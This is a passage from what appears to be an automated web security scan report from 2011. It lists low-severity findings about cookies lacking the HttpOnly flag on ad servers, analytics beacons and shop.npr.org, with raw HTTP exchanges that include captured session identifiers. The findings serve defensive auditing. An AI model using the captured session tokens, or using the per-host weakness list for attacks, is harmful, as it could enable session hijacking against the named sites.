Set-Cookie: tbcsrv3=kaBll62z16dkaZuQlaLVqtXYqtDOoZ%2BDqaZqmG2E2KaGqKZymKhVk9Wo0Oeq3Y9uq5ugbVK7hoSuq56hbVrE16epiG7VrW6ej3eZzdqUo4hu1a1tno%2BmrMLimFKhppylcobBi1qc4W1loFXP2KzW3FVz1KhmaohplKZan%2BBta5uQrZnWVZ3mcpmnVW%2BWoGNniG7VrWyej5Sqxs9Va9ltla1alp5nWpzhbWOgVc7UrIaopnKYqFVjmGGZq2qZj26rm6FtUtKi0JVz16drcoObbGaUa5Sjb4aopnKaqFWT1aDS1Kbd1pdanOFtYZlthNakyc6lm8nPoZ7Ln9WVc9enbHKD4aiSyqLP1KHSj26rm55tUohu1a1uno%2BXp87PnJ6IbtWtaZanVZ7Q5mucz6nHoZvT2lVz1Khpaoig0det0NJVc9SobGqIm9Hlp9fQoqjGkG6joGaclZnI4FVz1KhkaohjhK6rnqVtWsPPlpvbo8XiWp%2FgbWqbkIiDiG7VrWmXp1We0OCWldii1tSszdyhWpzhbWCgVYSuq56mbVrU05SiyZvE1KqGqKZykahVUqGmnKpyhtyjrMrdoaOIbtWtaJ6PVXPUqGpqiKDR16TF25panOFtYqBVx%2BFan%2BBta5uQnKPTVZ3mcpSnVVqc4W1ioFXS6Vqf1m1pnOFtZKBVxdSs149uq5uebVKIbtWtbZ6Ppq3D15dSoaacpm6ej5akxs%2Blk86U0OGd0OBhntDma5zPqcehm9PaYaDQ4KKjyaLS2Fqf4G1wm5CmpcicxuGt0Y9uq5ufZGqIZJKjaJSdY3Gap2ZSoaacq3KG3KOsyt2hkdJVneZylKdVWpzr; path=/; domain=.tinbuadserv.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript; charset=UTF-8
Content-Length: 584

tinbuAdServer.setArrayCookie("tbv3ads","browserlang|en","country|US","city|Dallas","state|TX","metro|623","zip|75207","area|214","lat|32.7825","lon|-96.8207","companyid|clearchannels","subdomain|","do
...[SNIP]...

11. Cookie without HttpOnly flag set  previous  next
There are 123 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289669 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=40370B55097864C515B0CFFAAF826F53; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:35:19 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

11.2. http://beacon-1.newrelic.com/1/fffa2293e6  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://beacon-1.newrelic.com
Path:   /1/fffa2293e6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/fffa2293e6?a=80779&be=3261&dc=4901&fe=6553&qt=15&ap=639&to=JQkPEEYOCQ8GQ0oFXwVJSQtACQARSg%3D%3D&v=4 HTTP/1.1
Host: beacon-1.newrelic.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Server: NewRelic
Date: Mon, 09 May 2011 15:35:53 GMT
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: JSESSIONID=36tpjk7k23ke15sjosx24zldg;Path=/
Expires: Thu, 01-Jan-1970 00:00:00 GMT


11.3. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=172249&iad=1304955321345-89810743578709660&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3BA3B870213B0BC2343870AF21CD1B45; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 09 May 2011 15:35:21 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669");

11.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ECB3DBA48FEF66EDAE9A7E846E561B69; Path=/
Content-Type: text/javascript
Content-Length: 8015
Date: Mon, 09 May 2011 15:39:50 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2
...[SNIP]...

11.5. http://shop.npr.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shop.npr.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/story/story.php?storyId=136128917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:49 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=3asomka8201jdf038aopdaio11; expires=Tue, 10-May-2011 01:39:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25071

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

11.6. https://shop.npr.org/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=one_page_checkout&start=1 HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Referer: http://shop.npr.org/index.php?p=cart
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:43:58 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; expires=Tue, 10-May-2011 01:43:58 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 65651

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

11.7. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850974&migRandom=106464174&migTagDesc=Cingular&migAtlSA=286737327&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:02 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 15:39:02 GMT; domain=.mookie1.com
Set-Cookie: session=1304955542|1304955542; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

11.8. http://trc.taboolasyndication.com/usatoday/trc/2/json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/trc/2/json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usatoday/trc/2/json?list-id=rbox-t2v&id=746&list-size=3&uim=rbox-t2v&intent=u&uip=rbox-t2v&item-id=46732364&item-type=text&item-url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&page-id=3aaa656500e8a4b6125b0c5e5138f55323e20348&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989&uid=d80f7856-eeab-487a-988c-f15ce2ff8eb0&cv=4-6-12-44791-2054596&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415;Path=/usatoday/
Set-Cookie: taboola_wv=;Path=/usatoday/;Expires=Tue, 08-May-12 15:36:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 3450

trc_json_response =
{"trc":{"req":"35eb06aeafeca714ebec05bbb325c74c","session-id":"923a143436baa4e0bd9cd36ac2e2bd5f","session-data":"v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2f
...[SNIP]...

11.9. http://widgets.macroaxis.com/widgets/content.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://widgets.macroaxis.com
Path:   /widgets/content.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widgets/content.jsp?t=26&f=f&url=http%3A//www.hnedata.net/features/tr_stock_charts HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=4DCCBC38AE7AB60DE732C89671BAF0FB; Path=/
Content-Length: 47
Content-Type: text/html;charset=ISO-8859-1


MyXssMagic.serverResponse(['1']);

11.10. http://www.macroaxis.com/widgets/url.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=189FB444592D30A261C6DE609DF507AC; Path=/
Content-Length: 2449
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...

11.11. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

11.12. http://a1.interclick.com/ColDta.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; ucap=sl=1; FC_51=128531=17622395:1; IFC=n=1&w50020=1&a128531=1&e=634406242967180244; Aqprep_Banner300X250=128531=634405378967210244:50020; Li=1=734265&30=734245; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993&i100=&i90=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; domain=.interclick.com; expires=Wed, 08-Jun-2011 15:38:40 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:39 GMT

GIF89a.............!.......,...........D..;

11.13. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=51&b=50020&cid=633862074462683028&isif=f&rurld=www.csmonitor.com&sl=true&dvp=http%3A//www.csmonitor.com/Business&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; Li=1=734247&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Thu, 19-May-2011 15:38:17 GMT; path=/
Set-Cookie: FC_51=128531=17622395:1; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: IFC=n=1&w50020=1&a128531=1&e=634406242976940565; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: Aqprep_Banner300X250=128531=634405378976970568:50020; domain=.a1.interclick.com; expires=Sun, 07-Aug-2011 15:38:17 GMT; path=/
Set-Cookie: Li=1=734265&30=734245; domain=.a1.interclick.com; expires=Wed, 08-Jun-2011 15:38:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 836

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15%3Bsz%3D300x250%3Bclick%3Dhttp%3A//a1.interclick.com/i
...[SNIP]...

11.14. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

